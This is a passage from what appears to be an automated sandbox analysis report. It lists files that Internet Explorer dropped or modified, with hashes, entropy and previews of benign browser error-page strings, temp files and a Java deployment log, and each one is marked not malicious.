                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):356
                  Entropy (8bit):4.454669617440007
                  Encrypted:false
                  SSDEEP:6:o9+AFiquAF7Mf8Hquf8yMf4940quf494bLxMHKQBquHKQB:ocAFiquAF7Mf8Hquf8yMf47quf4Q9M9H
                  MD5:16786D59848043D046C9BCEB3355FA28
                  SHA1:2D4953C89D5A41719FBE525C8CA7E17D425EF4C7
                  SHA-256:3B681EC89F502DBB2871B7DDD6F08AA8F0ED93239A72DD1D35E5647A88B9A8BA
                  SHA-512:0B2B21A72854E15D721F252913813916E5E72FB6E87031C3BDDE2E2A06EC2BD5159141C51982D7C266E2E631E6B5AAA4D40C69D46490CA3CE08F9E42761D247D
                  Malicious:false
                  Preview:[2022/01/21 07:52:31.148] Latest deploy version: ..[2022/01/21 07:52:31.148] 11.211.2 ..[2022/01/21 07:53:17.827] Latest deploy version: ..[2022/01/21 07:53:17.827] 11.211.2 ..[2022/01/21 07:53:51.506] Latest deploy version: ..[2022/01/21 07:53:51.506] 11.211.2 ..[2022/01/21 07:54:15.935] Latest deploy version: ..[2022/01/21 07:54:15.935] 11.211.2 ..

                  C:\Users\user\AppData\Local\Temp\~DF1843E87D640EF8CE.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2958747893284419
                  Encrypted:false
                  SSDEEP:12:i9lQatjJ/klMuze0buVH7KSlhAb9OqQb0mXjn73zdbZq690lPR3/1SL/d:i9lRJslMoJbEHTzAb9tWB3zRQPR3i
                  MD5:2FA284D135122A8FB77891FBD1276827
                  SHA1:99B4B9DA563E614232554A9A61C0E45D008E2622
                  SHA-256:B258FB4992C6B967C530F6E64C24B21FF23F7CB18BB0FDE44EBA88850B087E05
                  SHA-512:369ADED0A935848E9EF8711443C3DD25BD9CA742258E922C68ED17F69E4F4F0C3A7CE78269363F69CCCF2AA2B81E9B4C07D28F43426E8DB640661929657421D9
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF1DF67103C7B135B0.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2980507302839481
                  Encrypted:false
                  SSDEEP:24:i9ll/mNUbESLQmUjUIjSlNUSd0cicdeqY7:wuNUbEfjjjjQd0DkTY
                  MD5:E97AF32E30CE5C392BF34ADEBC242B57
                  SHA1:3166B5D3567DC92E36831E4B4D9173641990BB17
                  SHA-256:A80B96B192EECFA3C84B2A220D3C22271A58C2123077C13A7FC2BA700B43B0F0
                  SHA-512:3D958362DCDF81D7A4D3B04BB45A610F2721D33129E66428B257DA489050559CF91618120336D69411A397F4D6F1C59B5D907D89D3D5780192D38C34C05132BD
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF415CDF66B989416D.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2895956470493434
                  Encrypted:false
                  SSDEEP:12:i9lAatTzRNHkqeEDsR8kymvP4QsYDknDXVFclg0S8U5EWZObXCrxhJChLmUcr2tV:i9lxtNEbEsnyW8dDcRlKZS4qhL6r2t
                  MD5:D838836073A4626E818B8FDB7BFD435C
                  SHA1:1D4FF0DC3E4F224E5C188DCC9FE370C8D2CB68F9
                  SHA-256:A36439788F8D5264664BFAC1F6A39C6003CE883E4BA6F91F0773E8FF27CF48C9
                  SHA-512:9126A6E5E18E190F8628853FC811ECFE78AEF1966683DA104335246063D5B177DE8FF2E0DD07F94CBFBA68E0CF64EFFAB02A375266EF7194012A6845599B139C
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF51154F53396188EE.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29903337031041927
                  Encrypted:false
                  SSDEEP:24:i9lUpyhNxo/4cwKF04HKNtdlNzoXOQgUM6C4:jchNq/xZHKfNkRgv
                  MD5:15D659AA6230F2B279731BD8DFC5DB8D
                  SHA1:E6E4EE815E33101ADE6EEAB3872887536B14E145
                  SHA-256:FCCAC6C228F56DD2C7047F0529573BB8A560E0D4B6A07D5755BE5E1D5A0069B3
                  SHA-512:472E5A3D32C29769471CD1B99ADF37B898B40C209C7B2FE9E2A28236527237F1F6552B869C1DA1AB85F163E037333AEEBB7C8494477DF53131DC8CC5F6CF90EF
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF7051319177FFF8B1.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29962676446835934
                  Encrypted:false
                  SSDEEP:24:i9llUNUuoYIx12YU+WXzqmXj+rH8lb37seI:wUNUDappDqmyL0Xse
                  MD5:85535B19A53EB55880EA604C2144E8ED
                  SHA1:99F204BDAA0280032580BB701D6C39837ACEDF0A
                  SHA-256:38B35543DC6053F02708DAB946C1441A2AD62A2D89282069CC5E212C3C16B749
                  SHA-512:2DDB2CBC6D3E0C414250139737125DC61D4350C110F49B365D129C0A7F35FF8782ADC11B5763C401AD556245A06529E47BF01766FF5A305A265DB2BC0F580908
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF76F10081FE1E3D0D.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29582505192665876
                  Encrypted:false
                  SSDEEP:24:i9l8TPrJNLE/4Kabw1FAjXCxI1imtV2QyrA:PPrJNLEgKa8FlxI1ioVTu
                  MD5:24816E605F50F33411589D3C30513F72
                  SHA1:394C7879E6BCF37E55E0B0B4AA24A7B471B75491
                  SHA-256:C708410D9C005126825B4981D66579D6CC4FC8C16B890DF9F88D14DDD8FF8791
                  SHA-512:1C3509114D0824560D56233BA2835EDE5458A69017C246E30E5F35845C5AF1B31A839929D284F6F6D87C3CC48CDC7B852EC431E6F1BB330DEB0DCDE28C1B0895
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF7A63264CD3C88DE7.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.295680397224418
                  Encrypted:false
                  SSDEEP:12:i9lQatj/NJzKErVm65vkliRJjwiVi8osvSQQIPRKJXonM8xgtkx+Yo/F:i9lR/N91ISvsiR+T8lPMJ4nM8Wtn
                  MD5:BD2F29EE423B8457B227254F1C1642CC
                  SHA1:9F7C2BA32CD32D1E82A5D8A7469FC40F5A4DD437
                  SHA-256:D21649E3967E77FCCB5E16071EDF25F1101FF14F3B7F0FFB6DA4DD530028D4C3
                  SHA-512:8AE807B85D2D1550800E48BB5F8DF2E90FE00922A950E281681330BB8B8526909D7A37B650CD791FB06AC835C0F0A5FC8561936C3610292ED517B1603FD391A1
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF80E3D54E28E527BE.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29804343872974354
                  Encrypted:false
                  SSDEEP:24:i9l2aNbFdHbbz8doG9GxPMN3wYuFQHgYau:PaNbFxrG98SOFQHd
                  MD5:0199900D4C7A7DB4158C2DB912C66A97
                  SHA1:DDF3E34B2BE8992AB0E2F3D04937EF70C3673FED
                  SHA-256:09C7B5BD0E6B3234229977B27A605B3C188FDD185B4D44196AEB61BD6B1A56F6
                  SHA-512:3509D88312E45CF99915ACDD24BBB46C0F329B490005B83A096A926A01480EACA5206E3DDE7EA03BF181701678F300FD11052AD1BE53C764639EDE12BC478530
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF83FDEC42C12270DC.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.3040813579761197
                  Encrypted:false
                  SSDEEP:12:i9lgqatZynNkuzYcdnoDfeoUtLX0BLKyDZIgixJqaZqCiWsWbbd/F:i9lgynNkoYcmD2fEgyD2TqaZqCidq
                  MD5:7539509676FB5C95E0FADA577B94D490
                  SHA1:F91DE353718578229C2BE79CEA57A441C8F21987
                  SHA-256:9DB10B38F5813CED84FBE97F2BE44C9FD76A03618CD8358D2B672562AECE06CE
                  SHA-512:4FB93697742971DA449525BD2CAC1BCC4F8D6D7C0285B028AAD247D41C12F432EFD3EB4EECB380FAEBDDF228641B2A2FFF6D93058CAE554816C2A10F99267EF3
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF847B8575778877FD.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29226829694770634
                  Encrypted:false
                  SSDEEP:24:i9lx7N7XoFI5C+CW3PhtEIg3Qh5SnIGl0+lAJcT8:U7NMFI41W3PI3QKnIGl5l
                  MD5:6052447E218D6A43FAF3D28210313E72
                  SHA1:C3202A5D9C77B494F7A1FE76C7FDB606B0B45851
                  SHA-256:C3A61DA913945A1D5379A1F6EBC504DE0423B0C652A3E37D56BBEB291C0B6D97
                  SHA-512:55121C9B673F89FEE1069142EFA93C0050AEEA40E5FBA669C18B93C007697156D720BA45C05988C22C36DB7D7E80714A53368CFE456595F8FC6FA57FE2F391BA
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF854BAA01E360BD39.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.1343391884485422
                  Encrypted:false
                  SSDEEP:3:Zg9Re0jbRe08CbRe0Y2FRe0urlnGtRe0q7Re0urlnGtRe0q7Re0urlnGtRe0qb:6y8ULCUb30ig30ig30if
                  MD5:1E6F8835EDD97FD797215CA554890FCD
                  SHA1:7EF2D8329E70F5EB27BE6D90C48BEEEB2A67228A
                  SHA-256:ADCB93E04BE0B17F99B3BB0A3965833D1E762928574079A1932C060FBCA3B268
                  SHA-512:16B8FA39C19CB133DBEAE08199136EBD533326D5CB4A2EB9F77C006226098237A654F4933DD4F6CAD863086D9A0F4AA1250BFB45205466AF0F88991C17FE58C1
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF913312156B81B715.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.13535943914952214
                  Encrypted:false
                  SSDEEP:3:xFsMIRe08+RMIRe0KIRe0BveIRe0urlj+veIRe0tB5rGkIWIRe0urlj+veIRe0tP:Dn0iRYvK3wKI5Wy3wKI5Wy3wKI5at
                  MD5:CBD6BDD4A6B0171C9528CBE373362712
                  SHA1:EDF97D745763877AEA26F31A4204E72BCE82AF36
                  SHA-256:A3449FC8A474B2C03CF7EB12317167A0FD417B387EC37937479B7C30EF968511
                  SHA-512:5DB92FA224B698BB713ABACE53FC78E1673C66A08FDCE67D8CAEDE8EAACA308193C7368266DD5DA8D1CCE93563312853A98D0C5391DF65D463E11362AC31EE9A
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DF92A2674FCB111FAD.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2921927540210404
                  Encrypted:false
                  SSDEEP:24:i9lx6/NJVeYfQ8YhahM7qLVX2iS7fjmDx+T:U6/NJVeYdhM7AVX2iu7mDE
                  MD5:BC0EFCC64E22209730DAA9B60F12C34D
                  SHA1:CB4F7141DA00355EEDAE794659A4739A23F3BD4A
                  SHA-256:7E9A76CDA84AF7E1540B2EAB21D8F86C5A1754FB2E2A29041B2C94F9D502D38C
                  SHA-512:A634E42BE10AB029B955830FFCD3315C429A2A9327AC7901673C5095B7C80A419BB9157D0FD7E0495C72625E66917B9B541B9DA78C6FC42D000EAC5EFF825172
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFA8E08E14F77016D9.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29548022398872736
                  Encrypted:false
                  SSDEEP:12:i9lQatjcv/klMuzeOzKqTl8OGJKirFK2u8clqJ0HGyZe1p8Cjs/d:i9lRcvslMorKqTlte98CugT8Cjs
                  MD5:3BDB3F46E18A7E33AA134A17C1328D52
                  SHA1:1AA067DDC68BC50CA4060CBDC064951B3DA8DEE2
                  SHA-256:4E3D41400F84182D67F86A388AD1344FF4DE28203C4E33AD470BDD9603EAC48B
                  SHA-512:B1374CE6D8501F59D5F677A22AD5CA35AD5E8595BD4F023EC6A39ED7DEC37E0D923FB89DEBA5336C57B0221717EEBB9BA9E072882897556A9D3A5B6EDA7F0D25
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFCD812BE71D10CCC1.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2948222211169545
                  Encrypted:false
                  SSDEEP:24:i9lRXslMotzPWE1trlQZ0HlAwXfRJyvR4+g:0XEpB0ZqXfvyv
                  MD5:10CC3D8270C4631DF824E9EEB4A17CC5
                  SHA1:AF47711BBCA8D1E953095E14343431A7C9B41822
                  SHA-256:D5356EAFE45B35FEFAF78C60947FD796503917DF47407F0559E8D5949517E94F
                  SHA-512:2C43E489A53F50D81A988D3FD2A0F791CAF9E0B1AD989A4EFEC1FF8846D3EDB0305F0A3071F058F3A66D876B37A48203D7C16B9FE5DACB4CC86369C24C5CFAE1
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFD5ADE20A5830836C.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.1360619400653136
                  Encrypted:false
                  SSDEEP:6:2I2LULJ3Mdy6lGb9K3KhUsA92K3KhUsA9s:P2ILJ3Mdy6kbo3KysY93KysYs
                  MD5:FC7BB6DC0AACD4B36599A1F9745B397D
                  SHA1:84E888EDFB796CBD4D5DDF31231AF48883F52A1B
                  SHA-256:B98CF3C6F69B7662A6D4EBF2BB231675EDFEBD4215B493DEEFCD536A5A61FB75
                  SHA-512:421E5DF77357C7B44BEAC6A90E782EDBF63DBE688F69F082034B71309876CAFB8245CD66DC5521322208FD782009B25328C75C23B28AB92AA1BB31CDE7339BE4
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFD696FD24AF459D7D.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2952051098609474
                  Encrypted:false
                  SSDEEP:24:i9lRFJN9EOprdr4eS1gFVjvCxg50ab1lzEci+O+:0FJN9EsrdUeUA5vCubPzEn+O
                  MD5:2DDB8F94F09540590A3B8495E2446D1C
                  SHA1:126B4CFB7992C8103735A340F2F1144BC013E53E
                  SHA-256:7245ED81E48DA5815C073F8F81514DA4A8668257483DEA76F6ADF703700F0D3E
                  SHA-512:13BEA98F4AE3FB68B2090DE31E3E5A4A3F90E828B173C0F27C83E43A8F807525BCA409AA869C1DD37CFD3A7D674F63B92EE197B305FC842CAB2B8EE71D113AFA
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFD962CE55E98449E3.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2950702279734174
                  Encrypted:false
                  SSDEEP:24:i9lRxNslR0UP9juPwY4BlV6UlU+nfVJA:0xNER0UJzHDVPl
                  MD5:9C760E8F60D9C3F2FC382CCD9C4FF5C7
                  SHA1:2C84F4604B594C2D3B563C2FC550A7FA142880C6
                  SHA-256:7BCE2AA0BC58BD72251E472952A74A701684ECBFB5896662169242CE043EDD94
                  SHA-512:FC803095E1BBA072BF58AC9037BFE7DCE0FB005EEB2BCFDF3C8A0EE054C01B00CC0468E40EDFF7BA0B1164B269B94CDB618E058EB1DCA4E28DEEF896520949F0
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFE8A3C73949904ED0.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2895015418785815
                  Encrypted:false
                  SSDEEP:24:i9lxzjEuocPlg+yCz90YHdHvOBlr3yflBEh8H8Ea:0zjEDcyCzWA2BljyNy6H8E
                  MD5:9004A72D7B88DD4B9AAB8E0D603E9F28
                  SHA1:F487358ADE51F3EA1E31B2DEAB05D1B562DAC2F3
                  SHA-256:E7157C1C13633D1D3AE70F0B0FF1CEFA18A17632A3FC88E3FB8C775B0AB700AA
                  SHA-512:3933A94AD1A55856C30BAA72AE264112C235012B057BFCBBBEBEC663BECED18726E39F00C0090B19371E09D02CFD5D6FBF011EAA06AAF03BD659DA2023204ADA
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\~DFEC6F717AEACD9B0C.TMP

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.13572565008702214
                  Encrypted:false
                  SSDEEP:6:qve/3/t/me/3Ua/K5/3Ua/K5/3Ua/KYt:qvKP5mK3UWs3UWs3UWd
                  MD5:30B608A3C13E302E067AC7E41980D334
                  SHA1:85578E2159228DC796D1B23AC3579142F0230ADD
                  SHA-256:DEC0D7145BF2AA60698C336481FB5AE86CC253C1260DB76722728C1C5C20D318
                  SHA-512:44B8F91BD585A304FC91F47311163D692EDA80E97B33F42CE3E1395022532CFBB38611C56339132376C4D1C3B853CADD735FBB50F614D897683A7B23EE7EAF3E
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3440
                  Entropy (8bit):3.1928448127259985
                  Encrypted:false
                  SSDEEP:48:Hdi0PgI0C9GrIorAsASFrdi0PgI0h683GrIorAczH:tPge9SLAJOPgz3SLAG
                  MD5:2254ED212BC40655A785732E9266C7AB
                  SHA1:FF74B0B5956756CFDB1DE654D2CD5BDD390CED19
                  SHA-256:6657314B16C5227AF1CD6489B14EED18BF319493C2AB55E24F19ACC94B57C58A
                  SHA-512:F6A2287D474B3C4F222E8A262CB5D9221A64F0D720D21EEBEC6FCB31F46BBCA56814673F934362474ECD6FDF944DAD6284B3A2F901438389EBDA678BF5A02957
                  Malicious:false
